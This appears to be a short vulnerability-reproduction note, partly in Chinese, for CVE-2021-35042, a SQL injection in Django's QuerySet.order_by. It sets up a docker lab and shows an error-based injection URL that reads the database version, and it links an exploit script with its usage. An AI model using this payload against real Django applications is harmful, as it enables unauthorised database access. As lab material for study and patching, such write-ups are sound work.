Django 3.1.x before 3.1.13 and 3.2.x before 3.2.5 allows QuerySet.order_by SQL injection if order_by is untrusted input from a client of a web application.
Django 3.1.x before 3.1.13
Django 3.2.x before 3.2.5
漏洞环境
https://github.com/errorecho/CVEs/tree/main/CVE-2021-35042/Envarrow-up-right
运行漏洞环境
docker-compose build docker-compose up -d
打开http://127.0.0.1:8000/vuln/?order=id,环境运行成功
http://127.0.0.1:8000/vuln/?order=id,环境运行成功
http://127.0.0.1:8000/vuln/?order=vuln_collection.name);select updatexml(1, concat(0x7e,(select @@version)),1)%23
exp脚本
https://github.com/errorecho/CVEs/blob/main/CVE-2021-35042/Exp/exp.sharrow-up-right
使用方法
./exp.sh http://127.0.0.1:8000/vuln/
最后更新于4年前
